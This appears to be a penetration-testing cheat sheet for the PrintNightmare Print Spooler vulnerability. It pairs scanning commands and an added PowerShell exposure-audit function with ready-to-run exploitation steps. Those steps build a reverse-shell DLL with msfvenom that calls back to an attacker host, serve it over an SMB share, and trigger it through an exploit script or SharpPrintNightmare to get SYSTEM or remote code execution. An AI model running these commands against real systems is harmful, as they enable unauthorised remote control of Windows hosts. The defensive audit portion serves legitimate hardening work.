PrintNightmare (CVE-2021-1675)
Check if vulnerable
Print Spooler service running — Most Windows hosts are vulnerable
rpcdump.py $IP | grep -i spooler
crackmapexec smb $IP -u user -p 'password' -M printnightmare
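Host-side counterpart to the checks above, as an added example that is not part of the original cheat sheet: run in an elevated PowerShell session on the Windows host itself, it reports whether the Spooler is running and whether policy values weaken driver-install protections. The function name Get-SpoolerExposure is hypothetical, and patch level is not checked here.

```powershell
# Added example (not from the original page): local Print Spooler exposure audit.
# Get-SpoolerExposure is a hypothetical name; run in an elevated session.
function Get-SpoolerExposure {
    $findings = New-Object 'System.Collections.Generic.List[string]'

    # 1. Service state: a stopped AND disabled Spooler removes the attack surface.
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'"
    if (-not $svc) {
        return [pscustomobject]@{ SpoolerRunning = $false; Findings = @('Spooler service not present') }
    }
    if ($svc.State -eq 'Running')      { $findings.Add('Spooler service is running') }
    if ($svc.StartMode -ne 'Disabled') { $findings.Add("Spooler start mode is $($svc.StartMode)") }

    # 2. "Allow Print Spooler to accept client connections" policy:
    #    2 = inbound remote printing disabled; any other state is left to OS defaults.
    $printers = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers'
    $policy   = Get-ItemProperty -Path $printers -ErrorAction SilentlyContinue
    if ($policy.RegisterSpoolerRemoteRpcEndPoint -ne 2) {
        $findings.Add('Remote spooler RPC endpoint is not disabled by policy')
    }

    # 3. Point and Print: non-zero values suppress the elevation prompt
    #    when a printer driver is installed or updated.
    $pnp = Get-ItemProperty -Path "$printers\PointAndPrint" -ErrorAction SilentlyContinue
    if ([int]$pnp.NoWarningNoElevationOnInstall -ne 0) {
        $findings.Add('NoWarningNoElevationOnInstall is non-zero')
    }
    if ([int]$pnp.UpdatePromptSettings -ne 0) {
        $findings.Add('UpdatePromptSettings is non-zero')
    }
    # An explicit 0 lets non-administrators install printer drivers.
    if ($pnp.RestrictDriverInstallationToAdministrators -eq 0) {
        $findings.Add('RestrictDriverInstallationToAdministrators is 0')
    }

    [pscustomobject]@{
        SpoolerRunning = ($svc.State -eq 'Running')
        Findings       = $findings.ToArray()
    }
}

Get-SpoolerExposure | Format-List
```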
Local Privilege Escalation
Add malicious DLL via Print Spooler — Escalate to SYSTEM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o evil.dll
impacket-smbserver share $(pwd) -smb2support
python3 CVE-2021-1675.py domain.local/user:'password'@$IP '\\$LHOST\share\evil.dll'
Remote Code Execution
Exploit remotely via Print Spooler
python3 CVE-2021-1675.py domain.local/user:'password'@$IP '\\$LHOST\share\evil.dll'
# Or from an existing shell:
.\SharpPrintNightmare.exe '\\$LHOST\share\evil.dll'